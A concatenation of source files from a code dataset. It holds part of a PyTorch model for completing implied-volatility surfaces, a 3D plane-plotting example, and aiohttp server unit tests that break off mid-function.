self.StdLogMoneyness]\r\n self.serializeObject(scalingValue, pathFile + \"scale\")\r\n return None\r\n \r\n \r\n def restoreWeights(self, fileName = None):\r\n #Restore graph of operations\r\n self.fe.load_state_dict(torch.load((self.metaModelName + \"fe\") if fileName is None else fileName))\r\n scalingValue = self.readObject(((self.metaModelName + \"fe\") if fileName is None else fileName) + \"scale\")\r\n \r\n self.MeanFwd = scalingValue[0]\r\n self.StdFwd = scalingValue[1]\r\n self.MeanLogMaturity = scalingValue[2]\r\n self.StdLogMaturity = scalingValue[3]\r\n self.MeanLogMoneyness = scalingValue[4]\r\n self.StdLogMoneyness = scalingValue[5]\r\n return\r\n \r\n def restoringGraph(self):\r\n #Restore graph of operations\r\n self.fe = None\r\n self.code = None\r\n \r\n self.buildModel()\r\n return\r\n \r\n #######################################################################################################\r\n #Evaluation functions\r\n #######################################################################################################\r\n \r\n #Same but with default session \r\n def evalModel(self, inputTest):\r\n bestLoss, reconstructedSurface, encodings, _ = self.calibratedFactors(inputTest)\r\n return bestLoss, reconstructedSurface, encodings\r\n \r\n \r\n def castToDataFrame(self, x):\r\n if type(x)==type(pd.Series()):\r\n return pd.DataFrame(x.values, index = x.index, columns = [x.name])\r\n return x\r\n \r\n def getLogMoneyness(self, batch):\r\n return batch[1].applymap(lambda x : (x[1])) if type(batch[1])==type(pd.DataFrame()) else batch[1].map(lambda x : (x[1]))\r\n \r\n def getLogMaturities(self, batch):\r\n return batch[1].applymap(lambda x : np.log(x[0])) if type(batch[1])==type(pd.DataFrame()) else batch[1].map(lambda x : np.log(x[0]))\r\n \r\n def evalBatch(self, batch, code):\r\n \r\n batchLogMoneyness = self.getLogMoneyness(batch)\r\n scaledMoneyness = (batchLogMoneyness.values - self.MeanLogMoneyness) / self.StdLogMoneyness\r\n logMoneynessTensor = torch.Tensor(np.expand_dims(scaledMoneyness, 1)).float() #Log moneyness\r\n \r\n # for j in np.random.choice(len(test[k]), 10):\r\n # filt = test[k].nBizDays >= 10\r\n batchLogMat = self.getLogMaturities(batch)\r\n scaledMat = (batchLogMat.values - self.MeanLogMaturity) / self.StdLogMaturity\r\n logMaturity = torch.tensor( np.expand_dims(scaledMat, 1) , requires_grad=True).float() \r\n \r\n codeTensor = code.repeat(batch[0].shape[0], 1).float()\r\n refVol = torch.tensor(batch[0].values)\r\n \r\n inputTensor = torch.cat((logMoneynessTensor, logMaturity, codeTensor), dim=1)\r\n outputTensor = self.fe( inputTensor )[:, 0]\r\n \r\n loss = torch.mean( (outputTensor - refVol)[~torch.isnan(outputTensor)] ** 2 )#torch.nanmean( (outputTensor - refVol) ** 2 ) \r\n return inputTensor, outputTensor, loss, logMaturity, codeTensor, logMoneynessTensor\r\n \r\n def getArbitrageTheta(self, dataSetList, initialFactorValue):\r\n \r\n sparseSurface = dataSetList[0]\r\n #Build tensor for reconstruction\r\n def reshapeDataset(df):\r\n return pd.DataFrame(np.reshape([df.values], (1,df.shape[0])), \r\n columns = df.index)\r\n reshapedDatasetList = [reshapeDataset(x) if x is not None else x for x in dataSetList]\r\n \r\n reshapedFactorValue = pd.DataFrame(np.reshape([initialFactorValue], (1,initialFactorValue.shape[0])))\r\n \r\n self.restoringGraph()\r\n \r\n nbDays = reshapedDatasetList[0].shape[0]\r\n nbFactors = reshapedDatasetList[0].shape[1]\r\n self.code = Code(nbDays, self.nbFactors, initialValue = reshapedFactorValue.values) #Latent variables\r\n self.optimizer_code = torch.optim.Adam(self.code.parameters(), lr=1e-2) #Optimizer for code\r\n \r\n self.restoreWeights()\r\n \r\n volPred = []\r\n for d in np.arange(nbDays) : \r\n batchOriginal = [(elt.iloc[d] if elt is not None else None) for elt in reshapedDatasetList]\r\n #get valid coordinates\r\n filteredBatch, filteredBatchCoordinates = loadData.removePointsWithInvalidCoordinates(batchOriginal[0],\r\n batchOriginal[1])\r\n keptCols = filteredBatch.index #batch[0].dropna(axis = 1, how=\"all\").columns\r\n batch = [(elt[keptCols] if elt is not None else None) for elt in batchOriginal ]\r\n \r\n #gradSeries = pd.Series(np.zeros_like(batch.values), index = batch.index)\r\n #for idx in gradSeries.index : \r\n tensorList = self.evalBatch(batch, self.code.code[d, :])\r\n outputTensor = tensorList[1]\r\n logMaturity = tensorList[3]\r\n logMaturity.retain_grad()\r\n \r\n maturityTensor = torch.exp(logMaturity).view(-1)\r\n impliedTotalVariance = torch.square(outputTensor) * maturityTensor\r\n self.fe.zero_grad()\r\n impliedTotalVariance.backward( torch.ones_like(outputTensor).float() )\r\n gradSeries = pd.Series((logMaturity.grad.view(-1) / maturityTensor.view(-1)).detach().numpy().reshape(batch[0].shape), index = batch[0].index)\r\n print(gradSeries)\r\n \r\n #indexZero = torch.Tensor(0).to(dtype=torch.long)\r\n #for i, (logMat, output) in enumerate(zip(logMaturity[:,0] ,outputTensor)) : #range(impliedTotalVariance.size(0)):\r\n # print((logMat, output))\r\n # maturityTensor = torch.exp(logMat)\r\n # impliedTotalVariance = torch.square(output) * maturityTensor\r\n # \r\n # gradTheta = torch.autograd.grad(impliedTotalVariance, logMat,\r\n # retain_graph=True, allow_unused=True, create_graph=True) / maturityTensor)\r\n # gradList.append(gradTheta.item())\r\n \r\n #for i in range(batch[0].shape[0]):\r\n # gradTheta[i, 0] = torch.autograd.grad(impliedTotalVariance[i], \r\n # [logMaturity[i,0]], \r\n # retain_graph=True, allow_unused=True, create_graph=True) / torch.exp(logMaturity[i,0])\r\n \r\n gradSeries = gradSeries.append(batchOriginal[0].drop(keptCols))[batchOriginal[0].index]\r\n volPred.append(gradSeries)\r\n \r\n volDf = pd.concat(volPred, axis = 1).transpose()\r\n reshapedReconstruction = pd.DataFrame(volDf.values, \r\n index = reshapedDatasetList[0].index, \r\n columns = reshapedDatasetList[0].columns)\r\n \r\n return reshapedReconstruction#.rename(sparseSurface.name)\r\n \r\n def calibratedFactors(self, dataSetList, initialFactorValue = None):\r\n #input, output = self.getLocationFromDatasetList(dataSetList)\r\n \r\n self.restoringGraph()\r\n \r\n nbDays = dataSetList[0].shape[0]\r\n self.code = Code(nbDays, self.nbFactors, initialValue = None if initialFactorValue is None else initialFactorValue.values) #Latent variables\r\n self.optimizer_code = torch.optim.Adam(self.code.parameters(), lr=1e-2) #Optimizer for code\r\n \r\n \r\n self.restoreWeights()\r\n \r\n def getLogMaturities(batch):\r\n return batch[1].applymap(lambda x : np.log(x[0]))\r\n \r\n nbCalibrationStep = 1000 if (\"nbCalibrationStep\" not in self.hyperParameters) else self.hyperParameters[\"nbCalibrationStep\"]\r\n calibrationLosses = []\r\n for __ in range(nbCalibrationStep):#range(100000): #Number of epochs\r\n res_ = []\r\n \r\n miniBatchIndex = np.random.choice(nbDays, 200) if (200 <= nbDays) else np.arange(nbDays)\r\n for k in miniBatchIndex : #random mini-batch\r\n batch = [(elt.iloc[k] if elt is not None else None) for elt in dataSetList]\r\n keptCols = batch[0].dropna().index #batch[0].dropna(axis = 1, how=\"all\").columns\r\n batch = [(elt[keptCols] if elt is not None else None) for elt in batch ]\r\n \r\n tensorList = self.evalBatch(batch, self.code.code[k, :])\r\n \r\n res_.append( tensorList[2] ) #mean of squared errors for each observation\r\n res = torch.mean(torch.stack(res_)) #Mean along mini-batches : training loss\r\n \r\n # res += torch.mean(torch.mean(code.code))**2 + (torch.mean(torch.mean(code.code**2)-1))**2\r\n self.optimizer_code.zero_grad() #set gradient to zero\r\n res.backward() #compute loss gradient wrt neural weights\r\n self.optimizer_code.step() #update neural weights and go to next iteration\r\n \r\n calibrationLosses.append(np.sqrt(res.item()))\r\n if self.verbose :\r\n print(__, calibrationLosses[-1]) #print RMSE\r\n \r\n if calibrationLosses[-1]<=min(calibrationLosses) :\r\n if self.verbose : \r\n print(\"New minimal error\", calibrationLosses[-1]) #print RMSE\r\n torch.save(self.code.state_dict(), self.metaModelName + \"code\" + \"Tmp\") #save code\r\n \r\n volPred = []\r\n self.code.load_state_dict(torch.load(self.metaModelName + \"code\" + \"Tmp\"))\r\n for d in np.arange(nbDays) : \r\n batchOriginal = [(elt.iloc[d] if elt is not None else None) for elt in dataSetList]\r\n #get valid coordinates\r\n filteredBatch, filteredBatchCoordinates = loadData.removePointsWithInvalidCoordinates(batchOriginal[0],\r\n batchOriginal[1])\r\n keptCols = filteredBatch.index #batch[0].dropna(axis = 1, how=\"all\").columns\r\n batch = [(elt[keptCols] if elt is not None else None) for elt in batchOriginal ]\r\n \r\n tensorList = self.evalBatch(batch, self.code.code[d, :])\r\n predSeries = pd.Series(tensorList[1].detach().numpy().reshape(batch[0].shape), index = keptCols)\r\n predSeries = predSeries.append(batchOriginal[0].drop(keptCols))[batchOriginal[0].index]\r\n volPred.append(predSeries)\r\n \r\n volDf = pd.concat(volPred, axis = 1).transpose()\r\n reshapedReconstruction = pd.DataFrame(volDf.values, \r\n index = dataSetList[0].index, \r\n columns = dataSetList[0].columns)\r\n calibratedFactors = np.reshape(self.code.code.data.cpu().numpy(), (nbDays, self.nbFactors))\r\n bestCalibration = -1\r\n \r\n if self.verbose :\r\n print(\"Average Loss : \", calibrationLosses[bestCalibration])\r\n \r\n return calibrationLosses[bestCalibration], reshapedReconstruction, pd.DataFrame(calibratedFactors, index = dataSetList[0].index), calibrationLosses\r\n \r\n def completeDataTensor(self, \r\n sparseSurfaceList, \r\n initialValueForFactors, \r\n nbCalibrationStep, \r\n *args):\r\n \r\n \r\n #Rebuild tensor graph\r\n self.restoringGraph()\r\n \r\n sparseSurface = sparseSurfaceList[0]\r\n #Build tensor for reconstruction\r\n def reshapeDataset(df):\r\n return pd.DataFrame(np.reshape([df.values], (1,df.shape[0])), \r\n columns = df.index)\r\n reshapedDatasetList = [reshapeDataset(x) if x is not None else x for x in sparseSurfaceList]\r\n \r\n reshapedValueForFactors = pd.DataFrame(np.reshape([initialValueForFactors],\r\n (1,initialValueForFactors.shape[0])))\r\n \r\n tmp = self.calibratedFactors(reshapedDatasetList, initialFactorValue = reshapedValueForFactors)\r\n return tmp[0], np.ravel(tmp[2].values), tmp[1].iloc[0].rename(sparseSurface.name), pd.Series(tmp[3])\r\n \r\n \r\n def commonEvalSingleDayWithoutCalibration(self, \r\n initialValueForFactors,\r\n dataSetList,\r\n computeSensi = False):\r\n \r\n #Rebuild tensor graph\r\n self.restoringGraph()\r\n #Build tensor for reconstruction\r\n nbObs = 1 if initialValueForFactors.ndim == 1 else initialValueForFactors.shape[0]\r\n nbPoints = dataSetList[1].shape[0] if dataSetList[1].ndim == 1 else dataSetList[1].shape[1]\r\n nbFactors = self.nbFactors \r\n \r\n reshapedValueForFactors = np.reshape([initialValueForFactors],\r\n (nbObs,nbFactors))\r\n \r\n \r\n self.code = Code(nbObs, self.nbFactors, initialValue = reshapedValueForFactors) #Latent variables\r\n codeTensor = self.code.code[k, :].repeat(nbPoints, 1)\r\n \r\n batchLogMat = self.getLogMaturities(dataSetList)\r\n scaledMat = (batchLogMat.values - self.MeanLogMaturity) / self.StdLogMaturity\r\n logMaturity = torch.tensor( np.expand_dims(scaledMat, 1) ).float() \r\n \r\n batchLogMoneyness = self.getLogMoneyness(dataSetList)\r\n scaledMoneyness = (batchLogMoneyness.values - self.MeanLogMoneyness) / self.StdLogMoneyness\r\n logMoneynessTensor = torch.Tensor(np.expand_dims(scaledMoneyness, 1)).float() #Log moneyness\r\n \r\n \r\n inputTensor = torch.cat((logMoneynessTensor, logMaturity, codeTensor), dim=1)\r\n outputTensor = self.fe( inputTensor )[:, 0]\r\n self.restoreWeights()\r\n \r\n #Build tensor for reconstruction\r\n # print(\"nbPoints : \", nbPoints)\r\n # print(\"initialValueForFactors : \", initialValueForFactors)\r\n # print(\"inputFeatures : \", inputFeatures)\r\n # print(\"outputFeatures : \", outputFeatures)\r\n # print(\"outputTensor : \", self.outputTensor)\r\n \r\n reconstructedSurface = outputTensor.detach().numpy().reshape(batch[0].shape)\r\n \r\n inputTensor = torch.cat((strikes, logMaturity, codeTensor), dim=1)\r\n #if computeSensi :\r\n # inputTensor.requires_grad = True\r\n outputTensor = self.fe( inputTensor )[:, 0]\r\n \r\n \r\n reshapedJacobian = None\r\n if computeSensi :\r\n reshapedJacobian = np.ones((nbObs, nbPoints, nbFactors)) if initialValueForFactors.ndim != 1 else np.ones((nbPoints, nbFactors))\r\n #for p in range(nbPoints) :\r\n # output.backward()\r\n # jacobian = input.grad.data\r\n # reshapedJacobian = tf.reshape(jacobian, shape = [nbObs, nbPoints, nbFactors])\r\n # if self.verbose :\r\n # print(reshapedJacobian)\r\n \r\n \r\n calibratedSurfaces = outputTensor\r\n factorSensi = None\r\n \r\n if initialValueForFactors.ndim == 1 :\r\n calibratedSurfaces = np.reshape(reconstructedSurface, (nbPoints))\r\n if reshapedJacobian is not None :\r\n factorSensi = np.reshape(reshapedJacobian, (nbPoints, nbFactors))\r\n elif initialValueForFactors.ndim == 2 :\r\n calibratedSurfaces = np.reshape(reconstructedSurface, (nbObs,nbPoints))\r\n if reshapedJacobian is not None :\r\n factorSensi = np.reshape(reshapedJacobian, (nbObs, nbPoints, nbFactors))\r\n \r\n \r\n return calibratedSurfaces, factorSensi \r\n \r\n \r\n \r\n def evalSingleDayWithoutCalibrationWithSensi(self, initialValueForFactors, dataSetList):\r\n return self.commonEvalSingleDayWithoutCalibration(initialValueForFactors, \r\n dataSetList,\r\n computeSensi = True)\r\n \r\n \r\n def evalSingleDayWithoutCalibration(self, initialValueForFactors, dataSetList):\r\n s,_ = self.commonEvalSingleDayWithoutCalibration(initialValueForFactors, dataSetList)\r\n return s\r\n \r\n #Take a full surface in entry, reconstruct it \r\n #and return sensitivities between points i.e. the jacobian of D(E(S)) w.r.t S\r\n def evalInterdependancy(self, fullSurfaceList):\r\n raise NotImplementedError(\"Implicit encoder model\")\r\n return\r\n \r\n \r\n \r\n #Return None if not supported\r\n def getDecoderCoefficients(self):\r\n raise NotImplementedError(\"Abstract Class !\")\r\n return None\r\n\r\n","repo_name":"mChataign/smileCompletion","sub_path":"Code/pytorchModel.py","file_name":"pytorchModel.py","file_ext":"py","file_size_in_byte":28386,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"9771710534","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom owcsimpy.geoobjects.bases.vector_py import Vector_py as Vector\nfrom owcsimpy.geoobjects.bases.rectplane_py import RectPlane_py as RectPlane\nfrom owcsimpy.geoutils.draw import draw\n\ndef genPlane(polar,az,Rod,translation):\n \n v = Vector(np.array([1,np.deg2rad(polar),np.deg2rad(az)]))\n ctrPoint=np.array(3*[translation])\n plane = RectPlane(normalVect=v,ctrPoint=ctrPoint,\n RodriguesAngle=np.deg2rad(Rod),dimensions=[2,1])\n\n return plane\n\n\n# Will draw 4 different canvases\nfig,axs = draw(subplots=True,figsize=(14,6),nrows=1,ncols=4,xlim=[-2,2],ylim=[-2,2],zlim=[-2,2])\n\n# Original position\npolar,az,Rod=0,0,0 # polar, azimuth, Rodrigues\ntranslation=0\nplane = genPlane(polar,az,Rod,translation)\n\nfig,axs[0] = draw(figure=fig,axes=axs[0],planes=plane,colors='blue',facecolors='blue')\naxs[0].set_title(\"angles=({},{},{}), x=y=z={}\".format(polar,az,Rod,translation))\n\n# Polar and azimuth\n# Copy previous object as a reference (black)\nfig,axs[1] = draw(figure=fig,axes=axs[1],planes=plane,colors='black',facecolors='black')\n\npolar,az,Rod=90,45,0 # polar, azimuth, Rodrigues\ntranslation=0\nplane = genPlane(polar,az,Rod,translation)\n\nfig,axs[1] = draw(figure=fig,axes=axs[1],planes=plane,colors='blue',facecolors='blue')\naxs[1].set_title(\"angles=({},{},{}), x=y=z={}\".format(polar,az,Rod,translation))\n\n# Rodrigues\n# Copy previous object as a reference (black)\nfig,axs[2] = draw(figure=fig,axes=axs[2],planes=plane,colors='black',facecolors='black')\n\npolar,az,Rod=90,45,30 # polar, azimuth, Rodrigues\ntranslation=0\nplane = genPlane(polar,az,Rod,translation)\n\nfig,axs[2] = draw(figure=fig,axes=axs[2],planes=plane,colors='blue',facecolors='blue')\naxs[2].set_title(\"angles=({},{},{}), x=y=z={}\".format(polar,az,Rod,translation))\n\n# Translation\n# Copy previous object as a reference (black)\nfig,axs[3] = draw(figure=fig,axes=axs[3],planes=plane,colors='black',facecolors='black')\n\npolar,az,Rod=90,45,30 # polar, azimuth, Rodrigues\ntranslation=0.5\nplane = genPlane(polar,az,Rod,translation)\n\nfig,axs[3] = draw(figure=fig,axes=axs[3],planes=plane,colors='blue',facecolors='blue')\naxs[3].set_title(\"angles=({},{},{}), x=y=z={}\".format(polar,az,Rod,translation))\n\n\nplt.show()\n","repo_name":"ardimasp/owcsimpy","sub_path":"docs/_build/html/modulerefs/geoobjects/basics/rectplane-1.py","file_name":"rectplane-1.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73026189813","text":"\"\"\"Tests for aiohttp/server.py\"\"\"\n\nimport asyncio\nimport socket\nfrom functools import partial\nfrom html import escape\nfrom unittest import mock\n\nimport pytest\n\nfrom aiohttp import errors, helpers, server\n\n\n@pytest.yield_fixture\ndef make_srv(loop):\n srv = None\n\n def maker(cls=server.ServerHttpProtocol, **kwargs):\n nonlocal srv\n srv = cls(loop=loop, access_log=None, **kwargs)\n return srv\n\n yield maker\n if srv is not None:\n srv.connection_lost(None)\n\n\n@pytest.fixture\ndef srv(make_srv):\n return make_srv()\n\n\ndef test_http_error_exception():\n exc = errors.HttpProcessingError(code=500, message='Internal error')\n assert exc.code == 500\n assert exc.message == 'Internal error'\n\n\ndef test_handle_request(srv):\n transport = mock.Mock()\n\n srv.connection_made(transport)\n srv.writer = mock.Mock()\n\n message = mock.Mock()\n message.headers = []\n message.version = (1, 1)\n srv.handle_request(message, mock.Mock())\n\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n assert content.startswith(b'HTTP/1.1 404 Not Found\\r\\n')\n\n\n@asyncio.coroutine\ndef test_shutdown(srv, loop):\n transport = mock.Mock()\n transport.close.side_effect = partial(srv.connection_lost, None)\n transport.drain.side_effect = []\n srv.connection_made(transport)\n assert transport is srv.transport\n\n yield from asyncio.sleep(0, loop=loop)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.1\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 0\\r\\n\\r\\n')\n\n srv._keepalive = True\n\n request_handler = srv._request_handler\n\n t0 = loop.time()\n yield from srv.shutdown()\n t1 = loop.time()\n\n assert t1 - t0 < 0.05, t1-t0\n\n assert transport.close.called\n assert srv.transport is None\n\n assert srv._request_handler is None\n assert request_handler.done()\n\n\n@asyncio.coroutine\ndef test_double_shutdown(srv):\n transport = srv.transport = mock.Mock()\n transport.close.side_effect = partial(srv.connection_lost, None)\n srv.connection_made(transport)\n srv.writer = mock.Mock()\n\n yield from srv.shutdown()\n assert transport.close.called\n assert srv.transport is None\n\n transport.reset_mock()\n yield from srv.shutdown()\n assert not transport.close.called\n assert srv.transport is None\n\n\ndef test_connection_made(srv):\n assert srv._request_handler is None\n\n srv.connection_made(mock.Mock())\n assert srv._request_handler is not None\n assert not srv._closing\n\n\ndef test_connection_made_with_keepaplive(srv):\n sock = mock.Mock()\n transport = mock.Mock()\n transport.get_extra_info.return_value = sock\n srv.connection_made(transport)\n sock.setsockopt.assert_called_with(socket.SOL_SOCKET,\n socket.SO_KEEPALIVE, 1)\n\n\ndef test_connection_made_without_keepaplive(make_srv):\n srv = make_srv(tcp_keepalive=False)\n\n sock = mock.Mock()\n transport = mock.Mock()\n transport.get_extra_info.return_value = sock\n srv.connection_made(transport)\n assert not sock.setsockopt.called\n\n\ndef test_data_received(srv):\n srv.connection_made(mock.Mock())\n\n srv.data_received(b'123')\n assert b'123' == bytes(srv.reader._buffer)\n\n srv.data_received(b'456')\n assert b'123456' == bytes(srv.reader._buffer)\n\n\ndef test_eof_received(srv):\n srv.connection_made(mock.Mock())\n srv.eof_received()\n assert srv.reader._eof\n\n\n@asyncio.coroutine\ndef test_connection_lost(srv, loop):\n srv.connection_made(mock.Mock())\n\n handle = srv._request_handler\n yield from asyncio.sleep(0, loop=loop) # wait for .start() starting\n srv.connection_lost(None)\n\n assert srv._closing\n\n yield from handle\n\n assert srv._request_handler is None\n\n\ndef test_srv_keep_alive(srv):\n assert not srv._keepalive\n\n srv.keep_alive(True)\n assert srv._keepalive\n\n srv.keep_alive(False)\n assert not srv._keepalive\n\n\ndef test_slow_request(make_srv, loop):\n transport = mock.Mock()\n srv = make_srv(slow_request_timeout=0.01, keepalive_timeout=0)\n srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.close.called\n\n\ndef test_bad_method(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'!@#$ / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.write.mock_calls[0][1][0].startswith(\n b'HTTP/1.1 400 Bad Request\\r\\n')\n\n\ndef test_line_too_long(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n srv.data_received(b''.join([b'a' for _ in range(10000)]) + b'\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.write.mock_calls[0][1][0].startswith(\n b'HTTP/1.1 400 Bad Request\\r\\n')\n\n\ndef test_invalid_content_length(srv, loop):\n transport = mock.Mock()\n srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: sdgg\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert transport.write.mock_calls[0][1][0].startswith(\n b'HTTP/1.1 400 Bad Request\\r\\n')\n\n\ndef test_handle_error(srv):\n transport = mock.Mock()\n srv.connection_made(transport)\n srv.keep_alive(True)\n srv.writer = mock.Mock()\n\n srv.handle_error(404, headers=(('X-Server', 'asyncio'),))\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n assert b'HTTP/1.1 404 Not Found' in content\n assert b'X-Server: asyncio' in content\n assert not srv._keepalive\n\n\ndef test_handle_error__utf(make_srv):\n transport = mock.Mock()\n srv = make_srv(debug=True)\n srv.connection_made(transport)\n srv.keep_alive(True)\n srv.writer = mock.Mock()\n srv.logger = mock.Mock()\n\n try:\n raise RuntimeError('что-то пошло не так')\n except RuntimeError as exc:\n srv.handle_error(exc=exc)\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n assert b'HTTP/1.1 500 Internal Server Error' in content\n assert b'Content-Type: text/html; charset=utf-8' in content\n pattern = escape(\"raise RuntimeError('что-то пошло не так')\")\n assert pattern.encode('utf-8') in content\n assert not srv._keepalive\n\n srv.logger.exception.assert_called_with(\"Error handling request\")\n\n\ndef test_handle_error_traceback_exc(make_srv):\n log = mock.Mock()\n srv = make_srv(debug=True, logger=log)\n srv.transport = mock.Mock()\n srv.transport.get_extra_info.return_value = '127.0.0.1'\n srv.writer = mock.Mock()\n srv._request_handler = mock.Mock()\n\n with mock.patch('aiohttp.server.traceback') as m_trace:\n m_trace.format_exc.side_effect = ValueError\n\n srv.handle_error(500, exc=object())\n\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n assert content.startswith(b'HTTP/1.1 500 Internal Server Error')\n assert log.exception.called\n\n\ndef test_handle_error_debug(srv):\n transport = mock.Mock()\n srv.debug = True\n srv.connection_made(transport)\n srv.writer = mock.Mock()\n\n try:\n raise ValueError()\n except Exception as exc:\n srv.handle_error(999, exc=exc)\n\n content = b''.join(\n [c[1][0] for c in list(srv.writer.write.mock_calls)])\n\n assert b'HTTP/1.1 500 Internal' in content\n assert b'Traceback (most recent call last):' in content\n\n\ndef test_handle_error_500(make_srv, loop):\n log = mock.Mock()\n transport = mock.Mock()\n transport.drain.return_value = ()\n\n srv = make_srv(logger=log)\n srv.connection_made(transport)\n srv.writer = mock.Mock()\n\n srv.handle_error(500)\n assert log.exception.called\n\n\ndef test_handle(srv, loop):\n\n def get_mock_coro(return_value):\n @asyncio.coroutine\n def mock_coro(*args, **kwargs):\n return return_value\n return mock.Mock(wraps=mock_coro)\n\n transport = mock.Mock()\n srv.connection_made(transport)\n\n handle = srv.handle_request = get_mock_coro(return_value=None)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert handle.called\n assert transport.close.called\n\n\ndef test_handle_uncompleted(make_srv, loop):\n transport = mock.Mock()\n closed = False\n\n def close():\n nonlocal closed\n closed = True\n\n transport.close = close\n\n srv = make_srv(lingering_timeout=0)\n\n srv.connection_made(transport)\n srv.logger.exception = mock.Mock()\n\n handle = srv.handle_request = mock.Mock()\n handle.side_effect = ValueError\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 50000\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n assert handle.called\n assert closed\n srv.logger.exception.assert_called_with(\"Error handling request\")\n\n\n@asyncio.coroutine\ndef test_lingering(srv, loop):\n\n transport = mock.Mock()\n srv.connection_made(transport)\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 3\\r\\n\\r\\n')\n\n yield from asyncio.sleep(0.1, loop=loop)\n assert not transport.close.called\n\n srv.reader.feed_data(b'123')\n srv.reader.feed_eof()\n\n yield from asyncio.sleep(0, loop=loop)\n transport.close.assert_called_with()\n\n\n@asyncio.coroutine\ndef test_lingering_disabled(make_srv, loop):\n\n class Server(server.ServerHttpProtocol):\n\n def handle_request(self, message, payload):\n yield from payload.read()\n return super().handle_request(message, payload)\n\n srv = make_srv(Server, lingering_time=0)\n\n transport = mock.Mock()\n srv.connection_made(transport)\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 50\\r\\n\\r\\n')\n\n srv.reader.feed_data(b'123')\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n srv.reader.feed_eof()\n yield from asyncio.sleep(0, loop=loop)\n transport.close.assert_called_with()\n\n\n@asyncio.coroutine\ndef test_lingering_zero_timeout(make_srv, loop):\n\n class Server(server.ServerHttpProtocol):\n\n def handle_request(self, message, payload):\n yield from payload.read()\n return super().handle_request(message, payload)\n\n srv = make_srv(Server, lingering_time=1e-30)\n\n transport = mock.Mock()\n srv.connection_made(transport)\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n'\n b'Content-Length: 50\\r\\n\\r\\n')\n\n srv.reader.feed_data(b'123')\n\n yield from asyncio.sleep(0, loop=loop)\n assert not transport.close.called\n srv.reader.feed_eof()\n\n yield from asyncio.sleep(0, loop=loop)\n transport.close.assert_called_with()\n\n\ndef test_handle_coro(srv, loop):\n transport = mock.Mock()\n\n called = False\n\n @asyncio.coroutine\n def coro(message, payload):\n nonlocal called\n called = True\n srv.eof_received()\n\n srv.handle_request = coro\n srv.connection_made(transport)\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n loop.run_until_complete(srv._request_handler)\n assert called\n\n\ndef test_handle_cancel(make_srv, loop):\n log = mock.Mock()\n transport = mock.Mock()\n\n srv = make_srv(logger=log, debug=True)\n srv.connection_made(transport)\n srv.writer = mock.Mock()\n srv.handle_request = mock.Mock()\n\n @asyncio.coroutine\n def cancel():\n srv._request_handler.cancel()\n\n loop.run_until_complete(\n asyncio.gather(srv._request_handler, cancel(), loop=loop))\n assert log.debug.called\n\n\ndef test_handle_cancelled(make_srv, loop):\n log = mock.Mock()\n transport = mock.Mock()\n\n srv = make_srv(logger=log, debug=True)\n srv.connection_made(transport)\n\n srv.handle_request = mock.Mock()\n # start request_handler task\n loop.run_until_complete(asyncio.sleep(0, loop=loop))\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n\n r_handler = srv._request_handler\n srv._request_handler = None # emulate srv.connection_lost()\n\n assert loop.run_until_complete(r_handler) is None\n\n\ndef test_handle_400(srv, loop):\n transport = mock.Mock()\n transport.drain.side_effect = []\n srv.connection_made(transport)\n srv.reader.feed_data(b'GET / HT/asd\\r\\n\\r\\n')\n\n loop.run_until_complete(srv._request_handler)\n\n assert b'400 Bad Request' in srv.transport.write.call_args[0][0]\n\n\ndef test_handle_500(srv, loop):\n transport = mock.Mock()\n transport.drain.side_effect = []\n srv.connection_made(transport)\n\n handle = srv.handle_request = mock.Mock()\n handle.side_effect = ValueError\n\n srv.reader.feed_data(\n b'GET / HTTP/1.0\\r\\n'\n b'Host: example.com\\r\\n\\r\\n')\n loop.run_until_complete(srv._request_handler)\n\n assert b'500 Internal Server Error' in srv.transport.write.call_args[0][0]\n\n\ndef test_handle_error_no_handle_task(srv):\n transport = mock.Mock()\n srv.keep_alive(True)\n srv.connection_made(transport)\n srv.connection_lost(None)\n\n srv.handle_error(300)\n assert not srv._keepalive\n\n\ndef test_keep_alive(make_srv, loop):\n srv = make_srv(keep_alive=0.1)\n transport = mock.Mock()\n closed = False\n\n def close():\n 